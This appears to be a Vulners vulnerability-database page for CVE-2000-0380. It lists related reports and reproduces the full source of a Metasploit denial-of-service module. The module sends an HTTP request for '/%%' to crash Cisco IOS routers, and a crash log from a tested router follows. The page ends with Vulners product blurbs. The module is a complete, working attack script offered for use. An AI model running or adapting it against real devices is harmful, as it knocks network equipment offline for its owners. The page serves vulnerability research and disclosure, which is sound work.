| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2000-0380 | 29 May 201815:50 | – | circl | |
| Cisco IOS HTTP Server Vulnerability - Cisco Systems | 1 Sep 201000:00 | – | nessus | |
| Cisco IOS HTTP Service GET Request Remote DoS | 29 Apr 200000:00 | – | nessus | |
| CVE-2000-0380 | 12 Jul 200004:00 | – | cve | |
| CVE-2000-0380 | 12 Jul 200004:00 | – | cvelist | |
| Cisco IOS HTTP GET /%% Request Denial of Service | 24 Sep 200714:05 | – | metasploit | |
| CVE-2000-0380 | 26 Apr 200004:00 | – | nvd | |
| Cisco IOS software vulnerable to DoS via HTTP request containing "%%" | 9 Nov 200000:00 | – | cert |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco IOS HTTP GET /%% Request Denial of Service',
'Description' => %q{
This module triggers a Denial of Service condition in the Cisco IOS
HTTP server. By sending a GET request for "/%%", the device becomes
unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '1154'],
[ 'CVE', '2000-0380'],
[ 'OSVDB', '1302' ],
],
'DisclosureDate' => '2000-04-26'))
register_options(
[
Opt::RPORT(80),
])
end
def run
connect
print_status("Sending HTTP DoS packet")
sploit = "GET /%% HTTP/1.0"
sock.put(sploit + "\r\n")
disconnect
end
end
=begin
Patrick Webster 20070915 Cisco 1600 Router IOS v11.2(18)P
IOS info:
IOS (tm) 1600 Software (C1600-Y-L), Version 11.2(18)P, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Mon 12-Apr-99 14:53 by ashah
Example crash:
%Software-forced reload
Preparing to dump core...
Router>
*Mar 1 00:03:06.349: %SYS-2-WATCHDOG: Process aborted on watchdog timeout, Process = HTTP Server
-Traceback= 80EE1BC 80F0EC0 80EC004 81C0832 81C0B2E 81C0C76 81C0D68 81C0E4E
Queued messages:
*** EXCEPTION ***
software forced crash
program counter = 0x80eaca6
status register = 0x2700
vbr at time of exception = 0x4000000
=end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation